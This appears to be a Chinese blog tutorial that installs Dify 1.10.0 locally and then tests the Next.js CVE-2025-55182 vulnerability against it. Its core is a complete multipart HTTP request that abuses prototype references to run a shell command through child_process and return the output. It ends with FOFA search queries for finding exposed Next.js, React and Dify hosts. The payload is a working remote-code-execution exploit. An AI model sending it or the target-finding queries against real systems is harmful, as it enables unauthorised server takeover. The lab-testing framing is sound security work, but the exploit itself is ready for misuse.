
一、安装dify(选定dify 1.10.0版本进行测试,最新版dify已修复,如有安装dify的童鞋建议更新到最新版)

dify github链接地址:https://github.com/langgenius/dify/tree/1.10.0
2.在本地系统中将dify 1.10.0项目git clone下来,具体命令如下
git clone -b 1.10.0 https://github.com/langgenius/dify.git
//我选择在虚拟机ubuntu系统中安装dify,所以我在ubuntu中git clone该项目
//项目比较大,如果下载比较慢的话,可能需要魔法,朋友们自己解决哈3.下载后,如下所示

4.根据dify安装指令开始安装dify,这里默认docker环境已配置好哈,指令如下
cd dify
cd docker
cp .env.example .env
docker compose up -d安装后,可以看到容器都已启动,如下所示

可以看到dify服务已起来

尝试在浏览器中访问dify试试,如下所示,访问正常,可以开始测试漏洞poc了

二、Next.js CVE-2025-55182 POC本地测试
1.配置burp代理,抓取dify请求包,如下所示

2.将/apps请求发送到Repeater,如下所示

3.构建poc进行测试,这里以获取当前用户信息的RCE测试,如下所示
poc:
POST /apps HTTP/1.1
Host: myservice.local
Next-Action: x
X-Nextjs-Request-Id: 91dmljym
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: hst51Myl5trXfvWsC9Ay6
Content-Length: 693
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('id').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"
[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--执行结果如下:

ps:fofa相关资产收集关键词
app="Next.js" && body="/_next/static/chunks/app/"body="react.production.min.js" || body="React.createElement(" || app="React.js" || app="Dify"